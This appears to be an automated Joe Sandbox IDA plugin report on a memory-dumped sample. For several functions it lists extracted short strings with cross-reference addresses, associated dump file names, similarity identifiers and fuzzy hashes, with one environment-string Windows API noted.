13, xrefs: 00F25BFC
r:i8, xrefs: 00F25899
ut, xrefs: 00F25CE3
gd, xrefs: 00F25E60
|r, xrefs: 00F253A8
y{, xrefs: 00F25B36
uw, xrefs: 00F25B57
tj, xrefs: 00F253BE
Xs, xrefs: 00F25CD8
=:, xrefs: 00F257CE
e>n<, xrefs: 00F2588E
n l, xrefs: 00F2596A
<j:h, xrefs: 00F25975
%r?p, xrefs: 00F2595F
b`, xrefs: 00F255F9
DD, xrefs: 00F25CEE
=?, xrefs: 00F25BF1
N~4|, xrefs: 00F2593E

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID: +$e$ n l$%r?p$<j:h$=:$DD$N~4|$Xs$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
API String ID: 0-3233044194
Opcode ID: 5d93e4e77a058eb361e18d0712e9e12496695ec53d9dd5c62ba86cc5fb1a67cc
Instruction ID: 6016add531f1423e9f8038c2a25801502e6734246d90944cda7f6b8e11ebfe2a
Opcode Fuzzy Hash: 5d93e4e77a058eb361e18d0712e9e12496695ec53d9dd5c62ba86cc5fb1a67cc
Instruction Fuzzy Hash: D3C21CB560C3848AE334CF14D842BDFBAF2EB82300F00892DD5E96B255D7B546499B9B

Function 00F246D0 Relevance: 36.0, APIs: 1, Strings: 19, Instructions: 1047COMMON

Download Yara Rule

Strings

+$e, xrefs: 00F2442B
13, xrefs: 00F25BFC
r:i8, xrefs: 00F25899
ut, xrefs: 00F25CE3
gd, xrefs: 00F25E60
|r, xrefs: 00F253A8
y{, xrefs: 00F25B36
uw, xrefs: 00F25B57
tj, xrefs: 00F253BE
Xs, xrefs: 00F25CD8
=:, xrefs: 00F257CE
e>n<, xrefs: 00F2588E
n l, xrefs: 00F2596A
<j:h, xrefs: 00F25975
%r?p, xrefs: 00F2595F
b`, xrefs: 00F255F9
DD, xrefs: 00F25CEE
=?, xrefs: 00F25BF1
N~4|, xrefs: 00F2593E

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID: +$e$ n l$%r?p$<j:h$=:$DD$N~4|$Xs$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
API String ID: 0-3233044194
Opcode ID: ebdafcf912e679838c85fcc9dd0e95287a024f441d6eee3dfd34d4f964e13fa6
Instruction ID: e8ae5d1fb5e5f07b0d4ace5c9e17216867a573c1ce08ec0d8ad20cb9881c1db5
Opcode Fuzzy Hash: ebdafcf912e679838c85fcc9dd0e95287a024f441d6eee3dfd34d4f964e13fa6
Instruction Fuzzy Hash: AEC20BB560C3948AD334CF14D852BDFBAF2FB82300F00892DC5E96B255DBB546499B9B

Function 00F11D2B Relevance: 18.0, APIs: 1, Strings: 9, Instructions: 479COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL ref: 00F11EC3

Strings

L, xrefs: 00F11D8F
8, xrefs: 00F11EEA
^, xrefs: 00F12034
y, xrefs: 00F11EF2
[, xrefs: 00F121EB
?, xrefs: 00F11EE2
|, xrefs: 00F12267
p, xrefs: 00F12095
a, xrefs: 00F121E6

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 8$?$L$[$^$a$p$y$|
API String ID: 237503144-3949209405
Opcode ID: d866a4c9009980b7ec5164591408c81e2e1bec64c1bd55363f24d5401392f2b4
Instruction ID: 3340d88557434ddbe0b687ffb4126f8bf9be16db73eb61232beed241d8e01953
Opcode Fuzzy Hash: d866a4c9009980b7ec5164591408c81e2e1bec64c1bd55363f24d5401392f2b4
Instruction Fuzzy Hash: 7012917590C7808BD364DB78C4913EEBBE1AF85320F144A2DE5D9973C2D6389985EB43

Function 00F160E9 Relevance: 17.1, Strings: 13, Instructions: 807COMMON

Download Yara Rule

Strings

JyTK, xrefs: 00F16160
uqrs, xrefs: 00F16AF0
3F&D, xrefs: 00F16273
L4, xrefs: 00F16780
~mfQ, xrefs: 00F1613E
pt}w, xrefs: 00F161F2
qRb`, xrefs: 00F16133
w}MI, xrefs: 00F16128
L4, xrefs: 00F16BA0
{zdy, xrefs: 00F1611D
*,-", xrefs: 00F166EF
ntxE, xrefs: 00F16112
t~v:, xrefs: 00F161E7

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID:
String ID: *,-"$3F&D$JyTK$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$L4$L4
API String ID: 0-2746398225
Opcode ID: 89c7f05369a95317d98e2b9e3c76588b1514f445dc08fcc71d7b4d6305df35d8
Instruction ID: d2244685849ba9394e743ae6f1c658041597a5edc5f1b2c97cac4da912071fb2
Opcode Fuzzy Hash: 89c7f05369a95317d98e2b9e3c76588b1514f445dc08fcc71d7b4d6305df35d8
Instruction Fuzzy Hash: C84224B6A083518FC7248F24D8817ABB7E2BFD6314F19853CD8D9CB251DB349845EB82

Function 00F0F60D Relevance: 16.6, APIs: 1, Strings: 8, Instructions: 845COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(?), ref: 00F0FDFC

Strings

=, xrefs: 00F0F978
m, xrefs: 00F0F8F4
#, xrefs: 00F0F721
6, xrefs: 00F0F620
g, xrefs: 00F0F9EA
\, xrefs: 00F0FB0F
x, xrefs: 00F0FBD4
w, xrefs: 00F0FAAD

Memory Dump Source

Source File: 00000000.00000002.2565581241.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2565549608.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565581241.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565765333.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565797220.0000000000F61000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2565988341.00000000010B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566023498.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566063974.00000000010DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566150045.00000000010E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566182827.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566221979.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566252488.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566330885.00000000010F6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566366352.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566398984.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566433006.000000000110F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566459150.0000000001110000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566487381.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566528773.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566559473.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566588935.000000000113F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566614923.0000000001142000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566647506.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566693344.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566721321.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566763001.000000000115C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566792955.000000000115D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566828417.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566853547.000000000115F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566964368.0000000001160000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2566988310.0000000001161000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567016426.0000000001165000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567051909.000000000116F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567077510.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567098098.0000000001171000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567132591.000000000117A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567161855.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.000000000118C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567186669.00000000011B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567335217.00000000011DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567359840.00000000011E0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567389866.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567452946.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2567485462.00000000011F7000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_z3IxCpcpg4.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: #$6$=$\$g$m$w$x
API String ID: 237503144-139252074
Opcode ID: 46e6c7509b58b1bd8977c74c88bcd9da65ba28da7de7021563348c9452238a8f
Instruction ID: 3b251a639337634ca6b77b6dea216c81019bcfa3db2e7a9f0194af91a8f7037e
Opcode Fuzzy Hash: 46e6c7509b58b1bd8977c74c88bcd9da65ba28da7de7021563348c9452238a8f
Instruction Fuzzy Hash: 48729232A1C7908BD324DB38C85539FBAD2ABD5320F198B3DE4E9C73D2D67889459742

Function 00F27740 Relevance: 16.6, Strings: 13, Instructions: 338COMMON

Download Yara Rule

Strings

}9F;, xrefs: 00F27F62
P-X/, xrefs: 00F27F99
f!V#, xrefs: 00F27F78
Z)o+, xrefs: 00F27F8E
S%g', xrefs: 00F27F83
DE, xrefs: 00F27FDB
